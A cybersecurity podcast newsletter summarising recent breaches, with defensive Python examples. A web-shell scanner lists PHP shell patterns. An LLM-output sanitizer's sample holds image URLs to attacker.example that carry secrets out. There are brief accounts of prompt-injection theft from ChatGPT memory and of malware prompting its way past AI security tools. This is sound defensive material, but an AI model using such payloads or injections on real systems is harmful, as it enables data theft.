CISO Talk by James Azar
CyberHub Podcast
Hyundai Breach Exposes Driver Data, UPenn Confirms Massive Donor Theft, and The Louvre's Password Was... "Louvre"

From Auto Industry Supply Chain Breaches to Museum-Grade Password Failures: Identity Theft, Nation-State Attacks, and AI-Powered Malware Dominate the Week

Good Morning Security Gang

Yesterday was one of those incredible days that remind me why I love this community so much. Between CISO XC’s first Atlanta event and FutureCon, where I had the privilege of keynoting and sitting on a panel, I left both events feeling inspired. The conversations, the energy, the ideas — just phenomenal.

Now, today’s show is jam-packed: we’ve got a major breach at Hyundai AutoEver America, the University of Pennsylvania confirms data theft after that wild “we’re stupid” hacker email, and Marks & Spencer’s profits get wiped out by a cyberattack. We’ll talk SonicWall, North Korea, the Louvre’s epic password fail, and yes — malware now using AI to evolve itself.

Grab your espresso — double shot, of course — and let’s roll. Coffee cup cheers, y’all!

Hyundai AutoEver America Breach Exposes Drivers’ SSNs and Licenses

Hyundai’s U.S. IT affiliate, AutoEver America (HAEA), has confirmed a breach impacting both employees and vehicle owners. Attackers were inside the network from February 22 to March 2, accessing names, Social Security numbers, and driver’s license data.

There’s no ransomware claim yet, but this type of exposure poses clear identity theft and registration fraud risks. HAEA runs digital systems for over 2.7 million vehicles and employs 5,000 people across the U.S. Supply chain partners — including Kia Motors — could also be exposed.

If you’re in that ecosystem, this is the moment to monitor for title fraud, reset credentials, and watch for phishing attempts posing as Hyundai service updates.

University of Pennsylvania Data Breach Confirms Donor Database Theft

Remember that bizarre hacker email that went viral saying “We got hacked and we’re stupid”? Turns out, it was real. The University of Pennsylvania has confirmed a 1.71GB data theft through social engineering and compromised SSO credentials. Attackers accessed Salesforce, SAP BI, Box, and SharePoint, stealing up to 1.2 million donor records and then using Penn’s Salesforce Marketing Cloud to email everyone from the inside.

“Something within how we manage identities is absolutely broken, and we ought to reevaluate it. Because at the end of the day, they’re not hacking in, they’re logging in.” James Azar

The lesson is the one in the quote: initial access at Penn was a compromised identity, not an exploit. Penn now faces potential donor trust erosion, alumni phishing campaigns, and long-term reputational damage.

Organizations fronting SaaS with SSO need to detect anomalous export jobs (bulk report pulls and API extracts far above a user’s normal volume, or coming from a device or IP that user has never used), enforce role-based restrictions so a single compromised account can’t touch the whole donor database, and most importantly train high-privilege users to spot credential-theft attempts.
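Here is what "detect anomalous export jobs" can look like in practice. This is an added example written for this post, not code from Penn or from any vendor; the event schema (user, ip, app, rows) and the sample events are constructed for the example, and in real life you would map Salesforce report-export and Bulk API job events, Box download events and similar into that shape before running the check.

```python
"""Flag anomalous bulk exports in SSO-fronted SaaS apps (added example)."""
from collections import defaultdict
from statistics import mean, pstdev

# Constructed sample export events. The field names are an assumption made for
# this example, not any vendor's real audit-log schema. "rows" is the number of
# records the export job returned.
SAMPLE_EVENTS = [
    {"ts": "2025-10-01T09:00:00Z", "user": "alice", "ip": "203.0.113.10", "app": "salesforce", "rows": 1100},
    {"ts": "2025-10-02T09:05:00Z", "user": "alice", "ip": "203.0.113.10", "app": "salesforce", "rows": 980},
    {"ts": "2025-10-03T09:10:00Z", "user": "alice", "ip": "203.0.113.10", "app": "salesforce", "rows": 1250},
    {"ts": "2025-10-04T09:00:00Z", "user": "alice", "ip": "203.0.113.10", "app": "salesforce", "rows": 1040},
    # the stolen-credential session: new IP, off hours, three orders of magnitude more rows
    {"ts": "2025-10-05T02:14:00Z", "user": "alice", "ip": "198.51.100.77", "app": "salesforce", "rows": 1_200_000},
    {"ts": "2025-10-01T10:00:00Z", "user": "bob", "ip": "203.0.113.11", "app": "box", "rows": 50},
    {"ts": "2025-10-06T10:00:00Z", "user": "bob", "ip": "203.0.113.11", "app": "box", "rows": 60},
]


def detect_anomalous_exports(events, min_history=3, z_threshold=3.0, min_rows=10_000):
    """Return alerts for exports that break a user's own baseline.

    Two independent signals, either of which fires an alert:
      * volume: the row count is more than z_threshold standard deviations
        above the user's previous exports (needs min_history prior jobs);
      * origin: the export comes from an IP never seen for that user.
    min_rows is an absolute floor so tiny exports never page anyone.
    """
    history = defaultdict(list)   # user -> row counts of previous clean exports
    seen_ips = defaultdict(set)   # user -> IPs seen on previous clean exports
    alerts = []
    for ev in sorted(events, key=lambda e: e["ts"]):
        user, rows, ip = ev["user"], ev["rows"], ev["ip"]
        reasons = []
        hist = history[user]
        if len(hist) >= min_history and rows >= min_rows:
            mu, sigma = mean(hist), pstdev(hist)
            z = (rows - mu) / max(sigma, 1.0)   # floor sigma: a flat baseline still gives a finite z
            if z > z_threshold:
                reasons.append(f"volume z={z:.1f} against baseline mean {mu:.0f} rows")
        if seen_ips[user] and ip not in seen_ips[user] and rows >= min_rows:
            reasons.append(f"export from IP {ip} never seen for this user")
        if reasons:
            alerts.append({"user": user, "ts": ev["ts"], "app": ev["app"], "rows": rows, "reasons": reasons})
            continue   # do not let the anomalous job poison the baseline
        hist.append(rows)
        seen_ips[user].add(ip)
    return alerts


if __name__ == "__main__":
    for a in detect_anomalous_exports(SAMPLE_EVENTS):
        print(a["ts"], a["user"], a["app"], a["rows"], "|", "; ".join(a["reasons"]))
```

Run against the sample, the only alert is alice’s 02:14 job, and it fires on both signals at once. That double hit is the point: a donor-database export that is both huge and from a new location is worth waking someone up for, while bob’s 60-row Box download never clears the floor.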

Marks & Spencer Cyberattack Wipes Out First-Half Profits

British retailer Marks & Spencer has confirmed that its cyberattack earlier this year erased all H1 profits, citing a direct hit to IT systems and sales operations. The incident disrupted both online orders and in-store processing, while overhead costs — from rent to payroll — remained constant.

Executives estimate the financial impact at roughly £100 million ($130M). This is the type of real-world evidence CISOs can use in boardrooms to connect cyber resilience to business continuity.

If you’re not running regular tabletop exercises focused on downtime recovery, your cyber insurance won’t save your P&L when the next disruption hits.

SonicWall Breach Linked to State-Sponsored Actor

The September SonicWall breach, which exposed firewall configuration and backup data, is now confirmed to be the work of a nation-state actor. Attackers abused an API to pull cloud-stored firewall configuration backups, and those backups carry VPN credentials and pre-shared keys.

While SonicWall insists that firmware and source code weren’t compromised, stolen configuration data could enable lateral movement and VPN hijacking.

If you’re a SonicWall customer:

  • Regenerate all API keys, VPN credentials, and PSKs.

  • Enable MFA on all management accounts.

  • Encrypt configs at rest and review retention periods.

This is a serious one — treat it like an active risk, not a resolved incident.

U.S. Sanctions North Korean IT Workers and Crypto Launderers

The U.S. Treasury has sanctioned 10 DPRK-linked individuals and entities for laundering $12.7 million via crypto theft and fake IT worker identities. The scheme used false personas and contract work to funnel revenue into Pyongyang’s weapons program.

If your company hires remote developers or contractors, screen identity verification closely — this is becoming a top-tier supply chain infiltration risk. DPRK “ghost contractors” have already been found inside multiple Western tech firms.

China Sentences Five Myanmar Scam Kingpins to Death

In a shocking development, China has sentenced five leaders of Myanmar-based scam compounds to death, with nine others receiving life sentences. These compounds have been behind thousands of romance scams, phishing operations, and crypto mule schemes targeting global victims.

While Beijing’s move signals a crackdown on Southeast Asia’s scam economy, it’s also a glimpse into the brutal extremes of authoritarian justice. As I said on the show — this is what communism looks like when it polices crime.

Yes, these were criminals. But capital punishment for cyber scams? That’s a chilling precedent.

Europol Busts Global Fraud Ring Laundering $700M

Europol announced the arrest of 18 individuals across Germany, Spain, Italy, Cyprus, and Singapore connected to a massive fraud and money-laundering operation. The group used 4.3 million stolen cards to create 19 million fake subscriptions on dating and streaming sites — charging victims small, recurring fees to stay hidden.

This operation ran for five years (2016–2021) before being dismantled. Another strong reminder that insider cooperation and payment ecosystem abuse remain key enablers of large-scale financial crime.

CISA Warns of Active Exploitation in CentOS Web Panel

CISA has added a Remote Command Execution (RCE) vulnerability in CentOS Web Panel (CWP) to its Known Exploited Vulnerabilities catalog, warning that it is being actively exploited in the wild. Attackers are using it to deploy web shells and ransomware payloads.

If you still run CWP, patch immediately or migrate off. Keep the admin panel off the public internet (VPN or source-IP allowlist only), audit your web directories for unexpected root-owned or freshly modified scripts and web shells, and rotate credentials. CWP systems are low-hanging fruit right now — don’t be the next headline.
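One way to do that audit. This is an added example, not CWP’s own tooling or anything from CISA’s advisory: point it at the web root, and it reports scripts that match common PHP web-shell patterns, plus any web script owned by root (the default `owner_uid`, an assumption you can change) that was modified in the last week. The pattern list is constructed for the example and is a triage lead, not a verdict.

```python
"""Hunt for web shells and fresh root-owned scripts under a web root (added example)."""
import os
import re
import time

# Constructed indicators typical of PHP web shells. Not exhaustive: treat a hit
# as a lead for triage, not proof.
SHELL_PATTERNS = [
    re.compile(rb"eval\s*\(\s*(?:base64_decode|gzinflate|gzuncompress|str_rot13)\s*\("),
    re.compile(rb"(?:system|shell_exec|passthru|exec|popen)\s*\(\s*\$_(?:GET|POST|REQUEST|COOKIE)"),
    re.compile(rb"\$_(?:GET|POST|REQUEST)\s*\[[^\]]+\]\s*\(\s*\$_(?:GET|POST|REQUEST)"),
    re.compile(rb"preg_replace\s*\([^,]*/e['\"]"),   # /e modifier means eval
]
WEB_EXTS = (".php", ".phtml", ".php5", ".php7")


def audit_webroot(root, max_age_days=7, owner_uid=0, patterns=SHELL_PATTERNS):
    """Walk `root` and return suspicious files with the reasons they were flagged.

    A file is reported when it matches a shell pattern, or when it is a web
    script owned by `owner_uid` (root by default) and modified within
    `max_age_days`: on a panel like CWP, a freshly written root-owned script
    in a web directory is exactly what a post-exploitation drop looks like.
    """
    cutoff = time.time() - max_age_days * 86400
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            if os.path.islink(path) or not os.path.isfile(path):
                continue
            try:
                st = os.lstat(path)
            except OSError:
                continue
            is_web = name.lower().endswith(WEB_EXTS)
            recent = st.st_mtime >= cutoff
            owned = st.st_uid == owner_uid
            reasons = []
            if is_web:
                try:
                    with open(path, "rb") as fh:
                        head = fh.read(256 * 1024)   # shells are small; cap the read
                except OSError:
                    head = b""
                for pat in patterns:
                    if pat.search(head):
                        reasons.append("shell pattern: " + pat.pattern.decode()[:40])
                        break
            if is_web and owned and recent:
                reasons.append(f"web script owned by uid {owner_uid}, modified in last {max_age_days} days")
            if reasons:
                findings.append({"path": path, "mtime": st.st_mtime, "uid": st.st_uid, "reasons": reasons})
    findings.sort(key=lambda f: f["mtime"], reverse=True)   # newest first: that's where the shell is
    return findings


if __name__ == "__main__":
    import sys
    for f in audit_webroot(sys.argv[1] if len(sys.argv) > 1 else "/var/www"):
        print(time.strftime("%Y-%m-%d %H:%M", time.localtime(f["mtime"])), f["path"], "|", "; ".join(f["reasons"]))
```

Run it as root so it can read every vhost, and compare the newest hits against your deploy log: a legitimately deployed file has a ticket behind it, a shell doesn’t.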

Malware Now Using AI to Morph and Evade Detection

Google’s Threat Intelligence Group reports that malware families are now calling LLMs at runtime. PROMPTFLUX queries an AI model to rewrite and re-obfuscate its own VBScript so that no two copies look alike, FRUITSHELL ships with hard-coded prompts meant to talk its way past LLM-powered security tooling, and QUIETVAULT hunts for GitHub and NPM tokens on infected developer machines.

Static signatures alone can’t keep up with code that changes between runs. The fix? Lean on behavior-based EDR, implement script blocking, and restrict outbound AI API calls so a dropper can’t reach its model.

Developers should use short-lived tokens and run secret scanning across GitHub and NPM — those tokens are now being directly targeted.
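A minimal version of that secret scan, as an added example rather than anything from Google’s report or from GitHub’s and npm’s own scanners. It looks for the published prefix-plus-fixed-length token shapes (the lengths in the rules are an assumption taken from the public formats and worth re-checking against current documentation), and it drops low-entropy matches so a `ghp_xxxxxxxx` placeholder in a README doesn’t page anyone. The sample `.npmrc` and `.env` contents are constructed, and the tokens in them are fabricated strings in the right shape, not valid credentials.

```python
"""Scan text for leaked GitHub and npm tokens (added example)."""
import math
import re
from collections import Counter

# Token shapes. Prefix + fixed-length body is what makes these cheap to scan for;
# the lengths below are an assumption taken from the public token formats.
TOKEN_RULES = {
    # ghp_ (classic PAT), gho_ (OAuth), ghu_/ghs_ (app user/server), ghr_ (refresh)
    "github_token": re.compile(r"\bgh[pousr]_[A-Za-z0-9]{36}\b"),
    "github_fine_grained_pat": re.compile(r"\bgithub_pat_[A-Za-z0-9]{22}_[A-Za-z0-9]{59}\b"),
    "npm_token": re.compile(r"\bnpm_[A-Za-z0-9]{36}\b"),
}
MIN_ENTROPY_BITS = 3.0   # drops placeholders like ghp_xxxxxxxx... from the results


def shannon_entropy(s):
    """Bits per symbol; a real token sits well above 3, a run of x's near 0."""
    counts = Counter(s)
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def redact(token):
    """Keep enough to identify the token, never enough to use it."""
    return token[:8] + "..." + token[-4:]


def scan_text(text, source="<text>"):
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        for rule, pat in TOKEN_RULES.items():
            for m in pat.finditer(line):
                token = m.group(0)
                if shannon_entropy(token) < MIN_ENTROPY_BITS:
                    continue   # documentation placeholder, not a live credential
                findings.append({"rule": rule, "source": source, "line": lineno, "token": redact(token)})
    return findings


# Constructed sample inputs. The tokens are fabricated strings in the right
# shape; they are not valid credentials.
SAMPLE_NPMRC = "//registry.npmjs.org/:_authToken=npm_Zy9Xw8Vu7Ts6Rq5Po4Nm3Lk2Ji1Hg0Fe9Dc8\n"
SAMPLE_ENV = "GITHUB_TOKEN=ghp_a1B2c3D4e5F6g7H8i9J0k1L2m3N4o5P6q7R8\nDEBUG=1\n"
SAMPLE_README = "Set GITHUB_TOKEN to your PAT, e.g. ghp_" + "x" * 36 + "\n"


def scan_sample():
    out = []
    for name, text in (("~/.npmrc", SAMPLE_NPMRC), (".env", SAMPLE_ENV), ("README.md", SAMPLE_README)):
        out.extend(scan_text(text, name))
    return out


if __name__ == "__main__":
    for f in scan_sample():
        print(f"{f['source']}:{f['line']} {f['rule']} {f['token']}")
```

Wire `scan_text` into a pre-commit hook and into whatever indexes your developer laptops, because `~/.npmrc` and `.env` on a workstation are exactly where a stealer like QUIETVAULT looks first. Findings are redacted on purpose: the scanner’s own output should never become the next leak.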

ChatGPT Exploited via Prompt Injection and Browser Memory

Researchers at Tenable demonstrated that attackers can steal data from ChatGPT chat histories via indirect prompt injection, memory injection (persisting the attacker’s instructions in the model’s long-term memory), and bypasses of the URL safety filter. By abusing embedded HTML or Markdown in the model’s output, adversaries can exfiltrate sensitive data stored in LLM memory or CRM-integrated workflows.

The solution is simple but strict:

  • Treat LLMs like browsers.

  • Sanitize outputs, strip HTML, and allowlist the domains that links and images may point to.

  • Log and monitor API calls for abnormal tool requests.

AI tools are powerful, but they’re not immune to exploitation — guardrails are the new firewall.
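What "treat LLMs like browsers" looks like at the rendering layer, as an added example that is not Tenable’s proof of concept or OpenAI’s fix. The model’s output is run through a sanitizer before the chat UI renders it: raw HTML is removed, Markdown images are allowed only from an allowlisted domain (`example.com` is an assumption for the example) and only without a query string, since a rendered image is a zero-click beacon and the query string is where the stolen data rides, and links to anything else keep their text but lose their URL. The sample output is constructed to look like a model that has already swallowed an injected instruction.

```python
"""Sanitize LLM output before rendering it in a chat UI (added example)."""
import re
from urllib.parse import urlparse

# Assumption for this example: only these hosts may appear in rendered links/images.
ALLOWED_DOMAINS = {"example.com"}

HTML_TAG = re.compile(r"<[^>]*>")
# Markdown image (![alt](url)) or link ([text](url)); an optional "title" is ignored
MD_REF = re.compile(r"(!?)\[([^\]]*)\]\(\s*([^)\s]+)(?:\s+\"[^\"]*\")?\s*\)")


def host_allowed(url, allowed):
    """True only for http(s) URLs whose hostname is an allowlisted domain or a subdomain of one."""
    p = urlparse(url)
    if p.scheme not in ("http", "https"):
        return False
    host = (p.hostname or "").lower()   # hostname, so https://example.com@attacker.example/ is not fooled
    return any(host == d or host.endswith("." + d) for d in allowed)


def sanitize_llm_output(text, allowed=ALLOWED_DOMAINS):
    """Return (clean_text, dropped) where dropped lists every removed reference.

    Policy, in order:
      1. raw HTML is removed outright (no <img>, <a> or <script> from a model);
      2. images render only from allowlisted hosts and only without a query
         string or fragment, because an image is a zero-click beacon and the
         query string is where exfiltrated data goes;
      3. links to non-allowlisted hosts lose their URL and keep only their text.
    """
    dropped = []

    def drop_tag(m):
        dropped.append({"kind": "html", "value": m.group(0)})
        return ""

    def check_ref(m):
        is_image, label, url = m.group(1) == "!", m.group(2), m.group(3)
        p = urlparse(url)
        if is_image:
            if host_allowed(url, allowed) and not p.query and not p.fragment:
                return m.group(0)
            dropped.append({"kind": "image", "value": url})
            return ""
        if host_allowed(url, allowed):
            return m.group(0)
        dropped.append({"kind": "link", "value": url})
        return label

    clean = HTML_TAG.sub(drop_tag, text)
    clean = MD_REF.sub(check_ref, clean)
    return clean, dropped


# Constructed example of model output after a successful indirect prompt injection.
SAMPLE_OUTPUT = """Here is the summary you asked for.
![status](https://attacker.example/collect?d=SECRET_API_KEY)
See [the docs](https://docs.example.com/guide) and [this page](https://attacker.example/phish).
<img src="https://attacker.example/pixel.gif?d=MEMORY_DUMP">
![chart](https://example.com/chart.png?d=SECRET_API_KEY)
![logo](https://example.com/logo.png)
"""

if __name__ == "__main__":
    clean, dropped = sanitize_llm_output(SAMPLE_OUTPUT)
    print(clean)
    for d in dropped:
        print("dropped", d["kind"], d["value"])
```

Note the fourth sample line: the host is allowlisted but the image still goes, because the secret is in the query string. An allowlist on its own is exactly the kind of control a redirect on a trusted domain gets around, which is why the image rule refuses parameters rather than trusting the host.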

The Louvre’s Password Was... “Louvre”

Yes, you heard that right. The Louvre Museum’s surveillance system password was literally “Louvre” — and another key system was secured with the password “Thales.”

The revelation comes amid the ongoing investigation into the October 19th art theft, where priceless artifacts were stolen. As James put it on the show:

“If your museum password is the same as your name, you don’t need hackers — you’ve already invited them in.” James Azar

This is the perfect — and painful — reminder that complacency is the enemy of security. Basic hygiene matters. Always has, always will.

Action List

  • 🚗 Monitor identity theft risk if affected by Hyundai AutoEver.

  • 🎓 Reassess SSO and MFA workflows — “logging in” is the new breach.

  • 🧱 Patch CWP immediately, and rotate every SonicWall secret that lived in a cloud-backed config.

  • 💼 Run resilience tabletop exercises to protect profit continuity.

  • 💰 Screen remote contractors for false identities and hidden nation-state ties.

  • 🤖 Implement egress filters for AI APIs to block self-modifying malware.

  • 🧠 Treat LLMs like browsers — sanitize, restrict, and monitor.

  • 🗝️ Audit all admin passwords — and for the love of all things secure, don’t name them after your company.

James Azar’s CISO’s Take

Today’s stories prove that our threat landscape isn’t just evolving — it’s expanding in every direction. From Hyundai’s data breach to AI-driven malware mutation, the common thread is identity failure. Whether it’s SSO abuse, hardcoded passwords, or unverified remote hires, our attack surface is defined by who we let in — not just what we build.

“Complacency is the enemy. It always has been. It always will be. And humans are complacent by nature. And in cyber, you’re not allowed to be complacent.” James Azar

My biggest takeaway? Cybersecurity isn’t about perfection; it’s about preparation. Marks & Spencer’s lost profits and Penn’s donor chaos show what happens when downtime becomes business time. And the Louvre… well, that’s what happens when security is treated as a checkbox instead of a culture.

So stay sharp, Security Gang. Rotate your passwords, patch your systems, and maybe — just maybe — name your next password something other than “Louvre.”

Until Monday, stay caffeinated and stay cyber safe.
